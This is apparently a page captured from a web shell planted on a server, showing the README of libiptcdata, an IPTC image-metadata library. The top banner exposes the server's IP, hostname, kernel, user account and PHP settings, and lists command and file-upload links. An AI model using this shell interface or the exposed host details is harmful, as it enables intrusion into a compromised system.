Server IP : 192.168.23.10 / Your IP : 3.133.137.40 Web Server : Apache System : Linux echo.premieradvertising.com 5.14.0-362.8.1.el9_3.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Nov 7 14:54:22 EST 2023 x86_64 User : rrrallyteam ( 1049) PHP Version : 8.1.31 Disable Function : exec,passthru,shell_exec,system MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF Directory (0755) : /sbin/../share/ruby/../doc/libiptcdata/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
libiptcdata =========== David Moore <dcm@acm.org> DESCRIPTION ----------- libiptcdata is a library for manipulating the International Press Telecommunications Council (IPTC) metadata stored within multimedia files such as images. The library provides routines for parsing, viewing, modifying, and saving this metadata. The library is licensed under the GNU Library General Public License (GNU LGPL). The library implements the standard described at http://www.iptc.org/IIM The code itself was inspired by the libexif library: http://sourceforge.net/projects/libexif, written by Lutz Müller. Together, libexif and libiptcdata provide a complete metadata solution for image files. LIMITATIONS ----------- The current implementation of libiptcdata only supports extracting IPTC data from JPEG files (although it can decode raw IPTC data from any source as long as your application provides the data directly). The format for storing IPTC in JPEG files is a de-facto standard developed by Adobe.